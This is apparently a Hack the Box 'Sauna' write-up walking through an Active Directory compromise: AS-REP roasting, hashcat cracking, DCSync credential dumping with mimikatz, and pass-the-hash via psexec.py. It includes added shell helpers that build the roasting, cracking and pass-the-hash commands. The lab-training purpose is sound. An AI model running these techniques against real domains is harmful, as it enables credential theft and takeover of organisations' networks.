030#:HTB - Sauna

     It just so happens that the next one moving down the list of Hack the Box rooms is also on TJ Null’s OSCP prep list. It’s a Windows machine too, so this should be good practice.

Sauna - Nmap

     Unsurprisingly, there is a lot going on here. I added the egotistical-bank.htb domain to my hosts file, started a gobuster scan, and began combing over the website.

Sauna - Gobuster 1

     I didn’t notice anything in the source code, and gobuster didn’t reveal much besides a couple of restricted web directories. At this point I moved on to trying to enumerate LDAP and SMB shares/users, without much luck.

     Feeling a bit stuck, I went over the nmap results and the website pages again. This time through I noticed a bunch of employee names under a “meet the team” section of the site.

     For now, I made a user list with a few variations of each name.

Sauna - Users 1
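     As an added example (my own script, not code from the original post), here is a small shell helper that turns “First Last” names into the username formats Active Directory environments commonly use. The conventions it emits (first initial plus surname, first.last, first_last, and so on) are my assumption about what is worth trying; the names in the usage line are constructed placeholders, not the ones from the box.

```shell
#!/bin/sh
# Added example, not from the original post: build a candidate username list
# from "First Last" names (e.g. scraped from a "meet the team" page).
# The naming conventions below are assumptions about common AD formats.
set -eu

# Print the usual username formats for one "First Last" name, lower-cased.
gen_usernames() {
    first=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
    last=$(printf '%s' "$2" | tr '[:upper:]' '[:lower:]')
    f=$(printf '%s' "$first" | cut -c1)
    l=$(printf '%s' "$last" | cut -c1)
    printf '%s\n' \
        "$first" "$last" \
        "$f$last" "$first$l" \
        "$first.$last" "$f.$last" \
        "${first}_$last" \
        "$last$f" "$last.$first"
}

# Read "First Last" lines on stdin, emit a de-duplicated wordlist on stdout.
# Blank lines and single-word lines are skipped; any third token is dropped.
build_userlist() {
    while read -r first last _rest; do
        [ -n "$first" ] && [ -n "$last" ] || continue
        gen_usernames "$first" "$last"
    done | sort -u
}

# Usage (names are constructed placeholders):
#   printf 'Alice Example\nBob Sample\n' | sh userlist.sh --stdin > users.txt
if [ "${1:-}" = "--stdin" ]; then
    build_userlist
fi
```

     The de-duplication matters once you add initials, because two people sharing a surname can produce the same candidate; feeding duplicates to a Kerberos user-enumeration step just doubles the noise in the logs.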

     I have much less experience attacking Windows machines, so I started reviewing my notes to see where to go from here. I tried GetUserSPNs.py to look for Kerberoastable service accounts, which didn’t get me anything, so I referred to the guided-mode question to get back on track.

Sauna - Hint 1

     After switching tools (to GetNPUsers.py) and playing with the syntax, I was able to find an AS-REP-roastable account and get its hash. I also checked out the username-anarchy script they recommended and made a new user file called anarchy.txt. The username ended up being in my original list anyway, but I hadn’t known about this script beforehand, so it worked out.

Sauna - Impacket 1

     From here, we can quickly crack this hash with hashcat (mode 18200, Kerberos 5 AS-REP etype 23).

Sauna - Hashcat 2
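     To make the roast-and-crack step concrete, here is an added shell helper (my own code, not the author’s) that separates the `$krb5asrep$23$...` lines GetNPUsers.py prints from its status messages and assembles the impacket and hashcat command lines. The sample output is constructed to show the format; the realm, user and hex values are placeholders, and the domain, DC address and wordlist path in the usage are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post: handle the AS-REP roast output.
# GetNPUsers.py prints one "$krb5asrep$23$user@REALM:..." line per account
# with "Do not require Kerberos preauthentication" set, mixed with "[-]"
# status lines for the rest of the user list.
# The sample below is constructed to show the format; realm, user and hex
# values are placeholders, not data from the box.
set -eu

SAMPLE_OUTPUT=$(cat <<'EOF'
[-] User alice.example doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$jdoe@EXAMPLE.LOCAL:00112233445566778899aabbccddeeff$0a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d
[-] User bob.sample doesn't have UF_DONT_REQUIRE_PREAUTH set
EOF
)

# Keep only the hash lines: this is the file hashcat should be pointed at.
asrep_hashes() {
    grep '^\$krb5asrep\$' || true
}

# List the roastable accounts as user@REALM (the part between "$23$" and ":").
asrep_users() {
    asrep_hashes | sed 's/^\$krb5asrep\$23\$\([^:]*\):.*/\1/'
}

# Print (do not run) the two commands for this step:
#   1. impacket: try every name in the list without a password, hashcat format
#   2. hashcat mode 18200 = Kerberos 5 AS-REP etype 23
roast_cmds() {
    domain=$1; dc_ip=$2; users=$3; wordlist=${4:-/usr/share/wordlists/rockyou.txt}
    printf 'GetNPUsers.py %s/ -dc-ip %s -usersfile %s -no-pass -format hashcat -outputfile asrep.txt\n' \
        "$domain" "$dc_ip" "$users"
    printf 'hashcat -m 18200 asrep.txt %s\n' "$wordlist"
}

# Usage: sh asrep.sh demo   (domain, DC address and list name are placeholders)
if [ "${1:-}" = "demo" ]; then
    printf '%s\n' "$SAMPLE_OUTPUT" | asrep_users
    roast_cmds EXAMPLE.LOCAL 10.0.0.5 users.txt
fi
```

     Filtering the status lines out before cracking is the point: hashcat rejects a hash file that contains the `[-] User ...` lines, and pulling the user@REALM out of each hash tells you which account the cracked password belongs to when more than one comes back.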

     Now that I have a password, I revisited the nmap results to see what I could get into. Port 5985 (WinRM) is open, so I connected with Evil-WinRM.

     From here we find the first flag in this user’s Desktop folder. Interestingly, there are some other files there too; I realised someone else was working on this room at the same time as me. I had planned on starting with WinPEAS anyway, so that saved me a step.

     In the WinPEAS results I discovered an svc_loanmgr user and their password. I tried and failed to connect with Evil-WinRM as the new account, so I went back to the WinPEAS results for now. In the Autorun Applications section there were a bunch of potential leads, so I began by reading the HackTricks article linked in the results.

     That didn’t turn up anything worthwhile though. Having reached the end of the WinPEAS results, I decided to try the svc_loanmgr account some more. I used it to enumerate SMB, but after poking around the shares for a bit I didn’t find anything valuable.

Sauna - SMB 1

     I remembered seeing another username in the WinPEAS results that I had forgotten to write down. After running WinPEAS again, I found the other account was hsmith. People sometimes reuse credentials across accounts, so I tried the svc_loanmgr password against hsmith, which did not work.

     I also tried the password against the Administrator account, but that failed too. Feeling stuck, I returned to my notes. I hadn’t used BloodHound yet, and I had two accounts to explore, so that seemed like a good next step.

     From BloodHound’s GUI we can grab the SharpHound collector. Then, using Evil-WinRM’s upload and download commands, we can transfer the collector to the victim, run it, and pull the results back once it’s done.

Sauna - Bloodhound 3

     Once the data is ingested into BloodHound, we can mark the accounts we have as Owned. Then I used the built-in query “Shortest paths to Tier Zero / High Value targets” and began exploring.

     A lot of nodes appear, but the main thing I’m looking for here is connections to and from the accounts we have credentials for. FSmith doesn’t have much going on, but svc_loanmgr has DCSync rights over the domain, i.e. the replication privileges that let an account ask the DC for password hashes as if it were another DC. The notes in BloodHound say we can dump credentials with mimikatz using this; my own notes say secretsdump.py works at this step too, so I gave that a go.

     I ran into a couple of issues at this point, mainly that I couldn’t run mimikatz as the svc_loanmgr user. Logging in as that user with Evil-WinRM had failed before, but trying again now worked.

Sauna - WinRM 5

     The other problem was that when running mimikatz on the victim, it just kept looping the interactive prompt and wouldn’t let me run commands. One workaround is to pass the commands as quoted arguments when launching mimikatz, ending with exit, so it runs them non-interactively and quits.

     Nice! We have an NTLM hash for the Administrator account. I tried cracking it with rockyou.txt and another wordlist, and both failed to recover the password. When that didn’t work, I added the ntlm-1 and ntlm-2 values to my hash file too (these are the password-history entries mimikatz lists alongside the current hash). Running this against rockyou.txt cracked one of them.

     That password didn’t work when I tried connecting with Evil-WinRM though, which makes sense if it came from the history: it’s a previous password. Looking over my notes, I realised I don’t need to crack anything at all, because I can just pass the hash. Using psexec.py’s pass-the-hash option with the LM value combined with the NTLM value mimikatz listed for Administrator, I got a shell.

Sauna - Privilege Esc
Sauna - Flag 2
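     As an added example (my own helper, not the author’s commands), this shell script picks the current LM:NT pair for an account out of a secretsdump.py-style DCSync dump and assembles the psexec.py pass-the-hash command line. The dump lines, domain and host are constructed placeholders. The `_historyN` lines are the same thing as the ntlm-1/ntlm-2 values mimikatz shows: previous passwords, which is why a password cracked from one of them is rejected for the live account, and why the current NT hash is the one to pass.

```shell
#!/bin/sh
# Added example, not from the original post: from a DCSync dump to pass-the-hash.
# secretsdump.py (with -history) prints pwdump-style lines:
#   user:rid:LMHASH:NTHASH:::            current password
#   user_historyN:rid:LMHASH:NTHASH:::   previous passwords
# aad3b435b51404eeaad3b435b51404ee is the "empty" LM hash (no LM hash stored);
# 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password.
# The Administrator hashes below are constructed placeholders.
set -eu

SAMPLE_DUMP=$(cat <<'EOF'
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Administrator_history0:500:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
EOF
)

# Current LM:NT for one account, exactly as impacket's -hashes option wants it.
# History lines have a different first field, so they never match.
pth_hashes() {
    awk -F: -v u="$1" '$1 == u { print $3 ":" $4; exit }'
}

# All NT hashes for an account, current first then history: what to feed
# hashcat -m 1000 if cracking (rather than passing) is the goal.
nt_hashes_with_history() {
    awk -F: -v u="$1" '$1 == u || index($1, u "_history") == 1 { print $4 }'
}

# Build (do not run) the pass-the-hash command: psexec.py -hashes LM:NT domain/user@host
psexec_cmd() {
    domain=$1; user=$2; hashes=$3; host=$4
    printf 'psexec.py -hashes %s %s/%s@%s\n' "$hashes" "$domain" "$user" "$host"
}

# Usage: sh pth.sh demo   (domain and host are placeholders)
if [ "${1:-}" = "demo" ]; then
    h=$(printf '%s\n' "$SAMPLE_DUMP" | pth_hashes Administrator)
    psexec_cmd example.local Administrator "$h" dc01.example.local
fi
```

     Two practical checks before passing the hash: make sure the NT half is the current one (the first line for the account, not a `_history` line), and expect the LM half to be the empty-LM constant on any modern domain. psexec.py also accepts `:NT` with the LM part left blank, so the LM value is not doing any work here.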

     From here we get the final flag. This was a really fun room for practising against Windows machines, and it gave some good experience with the common tools used to attack them. I’m also glad I took good personal notes in the past, as they made navigating these tools and remembering what to check much easier.

[CATZ....HACKS]
